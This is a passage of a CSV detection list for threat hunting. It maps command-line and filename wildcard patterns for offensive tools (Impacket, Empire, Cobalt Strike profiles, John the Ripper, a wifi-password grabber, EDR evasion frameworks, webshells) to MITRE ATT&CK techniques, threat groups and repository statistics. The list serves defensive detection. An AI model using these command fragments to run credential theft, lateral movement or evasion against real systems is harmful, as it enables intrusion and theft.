tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* imap-log4shell.nse*,offensive_tool_keyword,nmap,Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/Diverto/nse-log4shell,1,0,N/A,N/A,4,347,51,2021-12-20T15:34:21Z,2021-12-12T22:52:02Z -* imap-ntlm-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* impacket *,offensive_tool_keyword,cobaltstrike,Fileless lateral movement tool that relies on ChangeServiceConfigA to run command,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Mr-Un1k0d3r/SCShell,1,0,N/A,10,10,1241,228,2023-07-10T01:31:54Z,2019-11-13T23:39:27Z -* impacket*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -* impacket*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,0,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -* impacket.*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -* impacket/*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -* --impersonate Administrator -shell *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* -impersonate* -hashes*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -* -ImpersonateUser *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* ImplantSSP.exe*,offensive_tool_keyword,ImplantSSP,Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start,T1547.008 - T1073.001 - T1055.001,TA0003 - TA0005,N/A,N/A,Persistence - Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -* import Exrop*,offensive_tool_keyword,Exrop,Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints,T1554,TA0003,N/A,N/A,Exploitation tools,https://github.com/d4em0n/exrop,1,0,N/A,N/A,3,265,26,2020-02-21T08:01:06Z,2020-01-19T05:09:00Z -* -ImportDllPathPtr *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* impress-remote-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -inc -u=0 *.pwd*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* -inc=digits *,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* inceptor.*dotnet*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1027 - T1055 - T1070 - T1112 - T1140,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -* inceptor.py*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1027 - T1055 - T1070 - T1112 - T1140,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -* inceptor.py*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -* inceptor.spec*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -* --includeModules amass*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -* -InFile Wi-Fi-PASS*,offensive_tool_keyword,wifigrabber,grab wifi password and exfiltrate to a given site,T1056.005 - T1552.001 - T1119 - T1071.001,TA0004 - TA0006 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/wifigrabber,1,0,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -* informix-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* informix-query.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* informix-tables.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -Injector NtMapViewOfSection*,offensive_tool_keyword,cobaltstrike,SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Tylous/SourcePoint,1,0,N/A,10,10,792,122,2022-11-17T01:04:04Z,2021-08-06T20:55:26Z -* -Injector VirtualAllocEx*,offensive_tool_keyword,cobaltstrike,SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Tylous/SourcePoint,1,0,N/A,10,10,792,122,2022-11-17T01:04:04Z,2021-08-06T20:55:26Z -* --input 10m_usernames.txt*,offensive_tool_keyword,ldapnomnom,Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP),T1110.003 - T1205,TA0001 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/lkarlslund/ldapnomnom,1,1,N/A,N/A,7,697,60,2023-03-31T16:18:14Z,2022-09-18T10:35:09Z -* -InputPath .\TrustedForests.txt*,offensive_tool_keyword,Locksmith,A tiny tool to identify and remediate common misconfigurations in Active Directory Certificate Services,T1552.006 - T1222 - T1046,TA0007 - TA0040 - TA0043,N/A,N/A,Discovery,https://github.com/TrimarcJake/Locksmith,1,0,N/A,8,5,472,38,2023-10-02T02:29:08Z,2022-04-28T01:37:32Z -* instabf.py*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://github.com/samsesh/insta-bf,1,0,N/A,7,1,39,6,2021-12-23T17:41:12Z,2020-11-20T22:22:48Z -* instainsane.sh*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://github.com/umeshshinde19/instainsane,1,0,N/A,7,5,473,329,2023-08-22T21:49:22Z,2018-12-02T22:48:11Z -* install *masscan*,offensive_tool_keyword,masscan,TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.,T1046,TA0007,N/A,N/A,Reconnaissance,https://github.com/robertdavidgraham/masscan,1,0,N/A,N/A,10,21683,2981,2023-08-09T13:28:54Z,2013-07-28T05:35:33Z -* install armitage*,offensive_tool_keyword,armitage,Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. recommends exploits and exposes the advanced capabilities of the framework ,T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002,TA0002 - TA0008 - TA0005 - TA0007 - TA0011,N/A,N/A,Exploitation tools,https://github.com/r00t0v3rr1d3/armitage,1,0,N/A,N/A,1,81,15,2022-12-06T00:17:23Z,2022-01-23T17:32:01Z -* install autobloody*,offensive_tool_keyword,autobloody,Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound,T1078 - T1078.003 - T1021 - T1021.006 - T1076.001,TA0005 - TA0001 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/CravateRouge/autobloody,1,0,N/A,10,4,330,38,2023-09-01T06:41:34Z,2022-09-07T13:34:30Z -* install backdoor-factory*,offensive_tool_keyword,the-backdoor-factory,Patch PE ELF Mach-O binaries with shellcode new version in development*,T1055.002 - T1055.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/secretsquirrel/the-backdoor-factory,1,0,N/A,10,10,3185,809,2023-08-14T02:52:06Z,2013-05-30T01:04:24Z -* install chisel*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,0,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z -* install evil-winrm*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* install github *merlin*,offensive_tool_keyword,mythic,Cross-platform post-exploitation HTTP Command & Control agent written in golang,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/merlin,1,0,N/A,10,10,57,10,2023-08-11T15:02:23Z,2021-01-25T12:36:46Z -* install hekatomb*,offensive_tool_keyword,HEKATOMB,Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them,T1087.002 - T1003.006 - T1027 - T1110.004,TA0006 - TA0007 - TA0010,N/A,N/A,AD Enumeration,https://github.com/Processus-Thief/HEKATOMB,1,0,N/A,N/A,4,372,40,2023-02-08T16:00:47Z,2022-09-09T15:07:15Z -* install holehe*,offensive_tool_keyword,holehe,holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.,T1598.004 - T1592.002 - T1598.001,TA0003 - TA0009,N/A,N/A,Reconnaissance,https://github.com/megadose/holehe,1,0,N/A,6,10,5659,655,2023-09-15T21:14:10Z,2020-06-25T23:03:02Z -* install krbjack*,offensive_tool_keyword,krbjack,A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.,T1558.002 - T1552.004 - T1048.005,TA0006 - TA0007 ,N/A,N/A,Sniffing & Spoofing,https://github.com/almandin/krbjack,1,0,N/A,10,1,73,13,2023-05-21T15:00:07Z,2023-04-16T10:44:55Z -* install nikto*,offensive_tool_keyword,nikto,Nikto web server scanner,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/sullo/nikto,1,1,N/A,N/A,10,7136,1096,2023-09-18T14:44:28Z,2012-11-24T04:24:29Z -* install wapiti3*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,0,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -* install wfuzz*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -* install wordlists*,offensive_tool_keyword,wordlists,package contains the rockyou.txt wordlist,T1110.001,TA0006,N/A,N/A,Credential Access,https://www.kali.org/tools/wordlists/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* install-sb.sh*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://github.com/samsesh/SocialBox-Termux,1,0,N/A,7,10,2417,268,2023-07-14T10:59:10Z,2019-03-28T18:07:05Z -* insTof.py*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://github.com/samsesh/insta-bf,1,0,N/A,7,1,39,6,2021-12-23T17:41:12Z,2020-11-20T22:22:48Z -* intel -d * -whois*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -* interact -u http*://*/*.aspx -p *,offensive_tool_keyword,SharPyShell,SharPyShell - tiny and obfuscated ASP.NET webshell for C# web,T1100 - T1059 - T1505,TA0002 - TA0003 - TA0004,N/A,N/A,Web Attacks,https://github.com/antonioCoco/SharPyShell,1,0,N/A,N/A,9,809,144,2023-09-27T08:48:31Z,2019-03-10T22:09:40Z -* --interface * --analyze --disable-ess*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* --interface * --analyze --lm --disable-ess*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* -Internalmonologue -Command *,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,0,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -* Inveigh-*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-InveighRelay.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* invoke admin-service -q *,offensive_tool_keyword,SharpSCCM,SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI,T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/Mayyhem/SharpSCCM/,1,0,N/A,N/A,5,412,53,2023-09-16T17:33:11Z,2021-08-19T05:09:19Z -* invoke admin-service -q *,offensive_tool_keyword,SharpSCCM,SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI,T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/Mayyhem/SharpSCCM/,1,0,N/A,N/A,5,412,53,2023-09-16T17:33:11Z,2021-08-19T05:09:19Z -* invoke query *FROM SMS_Admin*,offensive_tool_keyword,SharpSCCM,SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI,T1003 - T1021 